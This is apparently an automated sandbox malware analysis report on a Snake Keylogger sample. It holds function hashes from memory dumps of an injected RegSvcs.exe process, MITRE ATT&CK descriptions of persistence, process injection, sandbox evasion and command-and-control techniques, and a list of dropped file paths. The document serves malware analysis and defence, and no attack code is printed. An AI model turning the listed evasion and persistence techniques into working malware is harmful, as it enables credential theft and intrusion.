Opcode Fuzzy Hash: e66164b02d93e84b34ef18be2f23ad04210a21f7924434f02c336f8916b9a904
Instruction Fuzzy Hash: CA31A771A001298FCB04DF6DC884A9EBBF2FF89354B158255E915AB3A5CB35ED42CB90

Function 02B52060 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a5b51eb97df63ea4994a3db74db0b8b2cbad9f97044b448d93671b34af4423
Instruction ID: a50c985bcfe24118349782f5b526fa911cc49f0218bce7fe525af2e0505154d0
Opcode Fuzzy Hash: c5a5b51eb97df63ea4994a3db74db0b8b2cbad9f97044b448d93671b34af4423
Instruction Fuzzy Hash: F021E035A002269FCB14DB24C850BAE77B6EF9C260B14C459DC0A9B35CDB31EE82CBC1

Function 02B5D11E Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d419f16654305d8ba461383dd5cb78c66a502c61d47be65be724d55beff660
Instruction ID: 1ce338e2285173d2238fb9de9b99b6686c585515c8f99eb041f6e88ffec68db7
Opcode Fuzzy Hash: 12d419f16654305d8ba461383dd5cb78c66a502c61d47be65be724d55beff660
Instruction Fuzzy Hash: 25213931C112199ECF10EFE8D9546ECFBB0FF4A305F009629E904BB254EB346A8ACB40

Function 00EDD4F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1873219126.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_edd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca220710b3b222c695140c5ae9b16e9ac58fe2b0bb19eb93836ff561069d89e3
Instruction ID: 11de3382988e3134538cd285beaed5ee5dc3abbed8ce491c7849c6e5f1990e3b
Opcode Fuzzy Hash: ca220710b3b222c695140c5ae9b16e9ac58fe2b0bb19eb93836ff561069d89e3
Instruction Fuzzy Hash: EC2133B1508200DFCB15DF14EDC0F26BF65FB98328F20856AE80A1B346C336D856CBA1

Function 02B55A70 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f6d7ea1ca0575f97bd0c434ad30b59432f1bb12a0b0c2bbf38aaebdab6e4479
Instruction ID: a18c22ef21f36f2103901edcc990d780ccefaf53f6981c30d28327b8387d2289
Opcode Fuzzy Hash: 2f6d7ea1ca0575f97bd0c434ad30b59432f1bb12a0b0c2bbf38aaebdab6e4479
Instruction Fuzzy Hash: 7221D131300A218FC3299A28C49462EBBA2EF89722B5441A9FC16DF394CF31DC42CBC0

Function 02B5215C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1b32243eb69e5809fb69d8524cdce18bbef0b89cbb5abdf9ae6f13425cef361
Instruction ID: 5449171c57c3931fb209dafbe9f1227ebb25c1ce21ce6871791a697fe00f4c09
Opcode Fuzzy Hash: d1b32243eb69e5809fb69d8524cdce18bbef0b89cbb5abdf9ae6f13425cef361
Instruction Fuzzy Hash: E0113631E0426A9FCB01DBB8DC005DEFB71FF89210B248792D915B7150EA316946C7A0

Function 02B5D218 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2927f2d68c63f80de1b88df1c7ab76e8a610429332a0c70b7207718807971d22
Instruction ID: 7b217e9228f313ac4c2e9fe4088ad0953742282107de1571ebcd64b417c70202
Opcode Fuzzy Hash: 2927f2d68c63f80de1b88df1c7ab76e8a610429332a0c70b7207718807971d22
Instruction Fuzzy Hash: E5213E749012088FDF04EFB4D851AEDB7B2FB8A300F50A569D805773A4CB3A9942CF24

Function 02B539ED Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c72794f22a2b23322bc7d6649279a1dcfc2de6e294c55f3310ecbca869ba39b4
Instruction ID: 66df9f39995cb5f0544c47e0a1e33c4d9baffce87f45f75fba594351140604ab
Opcode Fuzzy Hash: c72794f22a2b23322bc7d6649279a1dcfc2de6e294c55f3310ecbca869ba39b4
Instruction Fuzzy Hash: 5631B578E11218CFCB04DFA8E5949ADBBF6FF49301B205469E819AB368DB31AD05CF40

Function 02B54DB9 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbf63f80d013f6572272ce186f37fba8625fc5bf03acd927e11881064e774a55
Instruction ID: 9a6fa6a560145994ae687c30e7c25c9984d6133c85a8927d554a5d40795a7003
Opcode Fuzzy Hash: cbf63f80d013f6572272ce186f37fba8625fc5bf03acd927e11881064e774a55
Instruction Fuzzy Hash: 9D21C0322041199FCB19AF64E445BAB3FB2EB48710F5044A9F915DB380CB39DE91CBE1

Function 02B5D228 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dba02d94f606c20112724403f4fae2995041d2870dc240daa6f8c57e9a01329
Instruction ID: 8441585a8ea1093ed34777a4261eda3d3564c18184c52c40a9dc7770b82a58f1
Opcode Fuzzy Hash: 1dba02d94f606c20112724403f4fae2995041d2870dc240daa6f8c57e9a01329
Instruction Fuzzy Hash: 692117749012088FDF08DFB4D850AEEB7B2FB89300F10A469D815773A4DB3AA942CF64

Function 00EDD4EB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1873219126.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_edd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: 8b06ef85f83aa4752c2a2993fedce622205289c70cff1d918a2a11810504075a
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: 8F11D376508240CFDB16CF14D9C4B16BF72FB94318F24C5AAD8095B756C33AD85ACBA1

Function 02B51F61 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7a5d7486710357f0ca033da7ffaf08d0781ec27c96282234bbe728c2b0e7d85
Instruction ID: 16a94b29219b4707f19e2f90fac866bc9f50b48b86f1e87a93e6811e889970f0
Opcode Fuzzy Hash: d7a5d7486710357f0ca033da7ffaf08d0781ec27c96282234bbe728c2b0e7d85
Instruction Fuzzy Hash: C821F2B4C1520A8FCB00EFA8C9956EEBFF0FF49300F10416AD805B2250EB315A85CFA1

Function 02B55607 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466f8b38075ab530b9922c3a05585a596f48dc90b067b5f920ac23efbee3da3e
Instruction ID: 0ce31de1d35fca117ac8f242144ec7ea4b78402f6c6007984d711a60f004d642
Opcode Fuzzy Hash: 466f8b38075ab530b9922c3a05585a596f48dc90b067b5f920ac23efbee3da3e
Instruction Fuzzy Hash: 1E01F9326000196BCB129E6498507EE3FE6DFC8351F584069F905DB240CA76991287A0

Function 02B51F08 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32a3250857d9f9a1fd605c9123a6d06fbecf6d109a092f57e9ddaef3483f0680
Instruction ID: e20ea989c20443a047d4b13ab8bf2996768df961ff3381edaba940c46293b1aa
Opcode Fuzzy Hash: 32a3250857d9f9a1fd605c9123a6d06fbecf6d109a092f57e9ddaef3483f0680
Instruction Fuzzy Hash: 3A1119B4C102198FCB00DFA8D5955EEBFF0FF49300F14416AE805B7264EB315A85CBA1

Function 02B52010 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4454a8b8b2db242f56c9f784bcc94efd833b6d709563be22903ec6e96e2764c
Instruction ID: 5b32983b11e6ee2f64287da91b0d0210699bbfdc41597d3590ef5d4c961247c9
Opcode Fuzzy Hash: e4454a8b8b2db242f56c9f784bcc94efd833b6d709563be22903ec6e96e2764c
Instruction Fuzzy Hash: DBE026B7D2022642CB009EE0ED045FEB334EFE1212F465B22C02072080FB30520E8260

Function 02B52020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1cd17705b325223d91a07f0245e583d914c712c8fe61e56db0f15d69971922
Instruction ID: 65796c6b09c89dcb44715985316754312f8fafbe344ea9273c532254887c604a
Opcode Fuzzy Hash: 4c1cd17705b325223d91a07f0245e583d914c712c8fe61e56db0f15d69971922
Instruction Fuzzy Hash: 17D05B31D2022B57CB10E7A5DC044EFF738FED6262B544626D51437154FB702659C6E1

Function 02B58258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: ed73559076092706b3043afec08fc361eacafaa59ce1ca17357ed0e2c5a1914d
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 1BC0123320C1382AA624208F7C40BA3AB8CC3C12B4A2501B7F95CEB200A8829C8041A8

Function 02B5A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bf16dd483ff0e31d1fa00589540b31a261c7998af306b7517b4e3e146aaf3d
Instruction ID: ca9b229e80b5f991f369729bb97ce3f59d0b3d1a62c060d399f3fc2201e07646
Opcode Fuzzy Hash: a4bf16dd483ff0e31d1fa00589540b31a261c7998af306b7517b4e3e146aaf3d
Instruction Fuzzy Hash: 95D0677AB510189FCB059F98E8808DDBBB6FB9C221B048116FA15A3261C6319961DB50

Function 02B55EA8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62a5f3642a58c1cf28492c42b96af5cd9063d058952b7b6bfbf9b51c13b56db8
Instruction ID: 5aa3e78971be8216cfb93480c4177dd7d06098d422c131caabdad0a88319a55b
Opcode Fuzzy Hash: 62a5f3642a58c1cf28492c42b96af5cd9063d058952b7b6bfbf9b51c13b56db8
Instruction Fuzzy Hash: 64D0957000C34E4BC346F730F9452153F29EB80304F501D95F80546407FD792D494353

Function 02B55EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1d4c2e2dc248682273e7a3fc54e40fd97935825871c78989c84aca945b50f7e
Instruction ID: 84eceeabbec9ff51617e5640e6d45b8981520abc141a7c098acabe776fa8fd38
Opcode Fuzzy Hash: c1d4c2e2dc248682273e7a3fc54e40fd97935825871c78989c84aca945b50f7e
Instruction Fuzzy Hash: 77C0223010030E87C105F770FA826043F1AEBC0300F106910B00A06109EE783E800292

Non-executed Functions

Function 02B56088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;dq, xrefs: 02B5609E
\;dq, xrefs: 02B56094
\;dq, xrefs: 02B560C6
\;dq, xrefs: 02B560BA

Memory Dump Source

Source File: 0000000B.00000002.1875557117.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2b50000_RegSvcs.jbxd

Similarity

API ID:
String ID: \;dq$\;dq$\;dq$\;dq
API String ID: 0-1855092343
Opcode ID: 355a7401d2202b8270b748175b1fc5413cf7a2a86bc1d70cb35e174e3d43b16d
Instruction ID: 2762bdd62b5665210ae7919ba3336265d06904879f6b258e16c00af5aed8b7e5
Opcode Fuzzy Hash: 355a7401d2202b8270b748175b1fc5413cf7a2a86bc1d70cb35e174e3d43b16d
Instruction Fuzzy Hash: 59011A317100358FCB249A2DC484B26B7EAEF986A876951AAE901CF2A4DF62DC41C790

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NPadpxkCGKGoat.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pgnlvtq.fds.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqhztgpy.eme.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1wr02qf.0f0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xic2njdh.pdv.psm1

C:\Users\user\AppData\Local\Temp\tmp9B09.tmp

C:\Users\user\AppData\Local\Temp\tmpAE14.tmp

C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe

C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe:Zone.Identifier

Windows Analysis Report
file.exe